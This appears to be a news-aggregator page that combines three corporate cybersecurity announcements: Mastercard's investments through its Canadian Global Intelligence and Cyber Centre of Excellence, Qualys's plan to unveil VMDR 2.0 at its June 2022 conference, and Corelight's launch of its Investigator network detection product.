Mastercard has significantly expanded its technology footprint in Canada over the past five years. In 2020, Mastercard announced **a $510 million CAD investment** **to establish the _Global Intelligence and Cyber Centre of Excellence_ in partnership with the Government of Canada** to achieve their shared vision of building a better, more secure digital economy for everyone by leveraging Canadian innovation. This builds on the acquisitions of Vancouver-based NuData Security and Toronto-based Ethoca.

As part of its ongoing commitment to strengthening Canadian innovation, **Mastercard has proudly invested more than $6.3 million in strategic partnerships and knowledge-sharing** across Canada’s entire tech ecosystem through the _Global Intelligence and Cyber Centre of Excellence_ to-date. These investments are designed to:

*   scale C&I research and development (R&D) and bring Canadian innovations to market faster, making the global digital economy more secure;
*   nurture next-gen Canadian talent and expand STEAM opportunities for underrepresented groups, as true cyber security demands that diverse talent drive inclusive innovation; and
*   provide small businesses and entrepreneurs with the same cyber security tools and protection as larger enterprises so Canada’s economy can continue to thrive.

  
Strategic partnerships and community investments announced by Mastercard include:

*   **Digital Main Street:** creating engagement tools that help Canadian “mom and pop” businesses become more cyber aware, as well as 10 post-graduate internship spaces at the Mastercard _Global Intelligence and Cyber Centre of Excellence_ over five years;
*   **Canadian Federation of Independent Business (CFIB):** creating gamified, mobile-first cyber training for small- and medium-sized businesses;
*   **Pow Wow Pitch:** sponsoring a new tech stream in the Indigenous Entrepreneurship Program;
*   **Mitacs:** creating 50 internships at Mastercard’s _Global Intelligence and Cyber Centre of Excellence_ for graduate students across Canada over five years;
*   **University of New Brunswick:** funding the Mastercard Research Chair in IoT and a new Cyber Security Research Lab;
*   **Rogers Cybersecure Catalyst:** accelerating cyber security training and young leader development at Toronto Metropolitan University;
*   **Science World:** developing STEAM training for girls in grades 2 to 9 through the “Tech-Up” program; and
*   **Girls4Tech:** expanding cyber programming for Canadian girls.

  
“Vancouver and Canada more broadly are brimming with talent and expertise in a range of STEM fields, including cyber and intelligence,” said Mansur Mirani, VP of the Mastercard Global Intelligence and Cyber Centre of Excellence in Vancouver. “Investments across our tech ecosystems, especially in diverse communities, unlocks additional potential in our knowledge economy that will keep Canada on the forefront of global cyber security innovation for generations to come.”

Mastercard Launches Cybersecurity “Experience Centre”

Company will detail enhancements to Vulnerability Management, Detection and Response solution next month.

FOSTER CITY, Calif., May 25, 2022 /PRNewswire/ -- Qualys, Inc. (NASDAQ: QLYS), a pioneer and leading provider of disruptive cloud-based IT, security and compliance solutions, today announced it is holding the Qualys Security Conference (QSC) San Francisco in tandem with RSAC on June 7-8.

At the event, Qualys will unveil significant updates to the company's Vulnerability Management, Detection and Response (VMDR) solution. The new enhancements redefine how enterprises manage cybersecurity risk with an unprecedented capability to prioritize and remediate at scale.

Through keynotes, live demonstrations, customer presentations, training sessions and networking, the Qualys customer community will dive into the profound impact of the digital journey and converse on best practices and case studies on risk management and security automation.

The week will feature talks from Qualys experts, customer success stories and a feature keynote at the Cloud Security Alliance CxO Trust Summit:

**Qualys QSC San Francisco Featuring VMDR Live  
**QSC San Francisco will be held in person at the Palace Hotel in San Francisco. To view the full schedule and to register for the event, visit the website.

**Highlights include:**

*   **Sumedh Thakar, President and CEO:** Security Automation for the Digital Journey
*   **Nagi Prabhu, Chief Product Officer:** Bringing the Unified Power of the Qualys Cloud Platform to Address Today's Security Challenges
*   QSC customer presentations from **First American Financial** and others.
*   **VMDR LIVE:** Redefining Cybersecurity Risk Management with VMDR
    *   Introducing VMDR 2.0 with TruRisk
    *   Fireside chat with Brian Penn, **Aflac**
    *   Join VMDR Live virtually at www.qualys.com/vmdr-live.
*   **Qualys Cocktail Reception:** Come network with Qualys experts, customers and industry practitioners on Tuesday, June 7 at 6:00 pm PT at the Palace Hotel.
*   **Training Sessions:** On Wednesday, June 8, Qualys will lead two training courses, including an introduction to Qualys VMDR and How to Manage and Secure Your Container Assets.

**Qualys at RSAC  
**Attendees with RSAC credentials are welcome to join the following RSAC events to network with industry peers and learn more about Qualys:

*   **CxO Trust Summit at RSAC****: Jonathan Trull, CISO at Qualys:** Measuring the Maturity of Your Cloud Security Program. June 6, 8:30 am – 3 pm PT, RSAC – Moscone Center South, level 3
*   **DevOps Connect – DevSecOps @RSAC****:** Connect with the Qualys DevOps team to learn more about VMDR and our cloud-based IT, security and compliance solutions. June 7, 8:30 am – 4 pm PT, RSAC – Moscone Center South

**About Qualys**  
Qualys, Inc. (NASDAQ: QLYS) is a pioneer and leading provider of disruptive cloud-based Security, Compliance and IT solutions with more than 10,000 subscription customers worldwide, including a majority of the Forbes Global 100 and Fortune 100. Qualys helps organizations streamline and automate their security and compliance solutions onto a single platform for greater agility, better business outcomes, and substantial cost savings.

The Qualys Cloud Platform leverages a single agent to continuously deliver critical security intelligence while enabling enterprises to automate the full spectrum of vulnerability detection, compliance, and protection for IT systems, workloads and web applications across on premises, endpoints, servers, public and private clouds, containers, and mobile devices. Founded in 1999 as one of the first SaaS security companies, Qualys has strategic partnerships and seamlessly integrates its vulnerability management capabilities into security offerings from cloud service providers, including Amazon Web Services, the Google Cloud Platform and Microsoft Azure, along with a number of leading managed service providers and global consulting organizations. For more information, please visit www.qualys.com.

Qualys to Unveil VMDR 2.0 at Qualys Security Conference in San Francisco

Corelight Investigator aids threat hunting and investigation through intelligent alert aggregation, built-in queries and scalable search

SAN FRANCISCO, May 25, 2022 /PRNewswire/ -- Corelight, the leader in open network detection and response (NDR), today announced Corelight Investigator, a SaaS-based solution that extends the power of open-source driven network evidence to SOC teams everywhere. Investigator delivers advanced capabilities for transforming network and cloud activity into evidence in a fast, intuitive platform that is easy to deploy and use.

Based on insights learned from savvy defenders in the Zeek open source community, Corelight Investigator provides not only advanced analytics and open access to the best network evidence, but the ability to do custom evidence enrichment unique to each environment. With Corelight Investigator, security teams can quickly accelerate threat hunting and investigations by mapping threat activity across the MITRE ATT&CK® framework and reduce alert volume with intelligent alert scoring.

"We believe that evidence is at the heart of cybersecurity for any organization," said Brian Dye, CEO of Corelight. "We have the privilege of working with defenders of critical infrastructure that can afford data lake architectures and in-house analytics teams to execute their evidence-driven cyber strategy. Corelight Investigator brings the design patterns of those elite defenders to the broader enterprise by combining advanced analytics and threat hunting capability with the power of Zeek, the industry de-facto standard for network evidence."

**Full network visibility with next-level analytics  
**Corelight Investigator brings complete visibility of the network, both on-premise and in the cloud, with evidence that spans months and years, not days and weeks. Customers can leverage machine learning, behavioral analysis, threat intelligence and signatures, mapped to the MITRE ATT&CK framework, to enable broad coverage of network-centric threats.

This evidence leads to specialized detections and enables the threat hunting necessary for advanced, persistent, and personalized attacks. In addition, it supports custom enrichment of network evidence - such as asset information, vulnerabilities, or per-asset context - and links threat hunting and incident response through custom alerts, queries, and dashboards.

"Unlike competitive 'closed' solutions, Corelight Investigator brings a new level of openness to the SaaS NDR market that enables customers to fully understand the logic behind machine learning based detections, and freely integrates these alerts with their existing tools for the broadest coverage," said Clint Sand, senior vice president of product for Corelight.

**Powered by open source and novel research  
**"Along with the advanced analytics that Corelight Labs provides, another advantage of Corelight Investigator is its ability to harness the analytical power of the open source Zeek and Suricata communities. That provides broad-based threat coverage including rapid zero-day response capabilities," said Vern Paxson, co-founder and chief scientist for Corelight. "The open-source nature of Zeek helps us illuminate _why_ a detection happened, as well as rich information about its surrounding context."

Corelight Investigator customers can access richly detailed, interlinked Zeek logs including access to DNS responses, file hashes, SSL as well as logs created by Corelight Labs - which continually creates new analytics for evolving threats and vulnerabilities using cross-customer visibility with the speed of SaaS – for both investigating those alerts and enabling threat hunting.

"As attacks continue to evolve and grow in sophistication, security teams need NDR solutions that provide not only timely and accurate detections, but the supporting context to respond quickly and effectively," said John Grady, senior analyst with ESG. "Corelight meets these requirements by bringing rich network evidence from its decades-long open source Zeek heritage, combined with novel analytics from an array of inferences, making it a powerful contender in the space."

**University of Missouri powers network visibility with Corelight Investigator  
**For many organizations, it is not possible to staff a full security or development team dedicated to parsing the expansive volumes of network traffic. This is true for the research and support services team at the University of Missouri that needed a solution that could provide full network visibility without the management overhead and other fine-tuning often required with competing solutions.

"We are a large university and we need to have full network visibility," said Aaron Scantlin, security analyst at University of Missouri. "It was simple to set up, which means the rest of my time is spent doing advanced analysis and other work."

In addition, Corelight Investigator quickly identifies threats on the network so the team can take immediate action as well as provides access to the raw data for additional investigation.

"Corelight Investigator ingests events so that we can query them in a snap," said Scantlin. "It improves our security posture by providing instant access to events we need to act on."

**Pricing and availability  
**Corelight Investigator joins the Corelight Sensor product portfolio and will be generally available in June. Corelight customers and prospects can contact sales directly for pricing information. More information Corelight Investigator can be found on the Corelight website.

**About Corelight  
**Corelight provides security teams with network evidence so they can protect the world's most critical organizations and companies. Corelight's global customers include Fortune 500 companies, major government agencies, and large research universities. Based in San Francisco, Corelight is an open-core security company founded by the creators of Zeek®, the widely-used network security technology. For more information, www.corelight.com.

Tag

#intel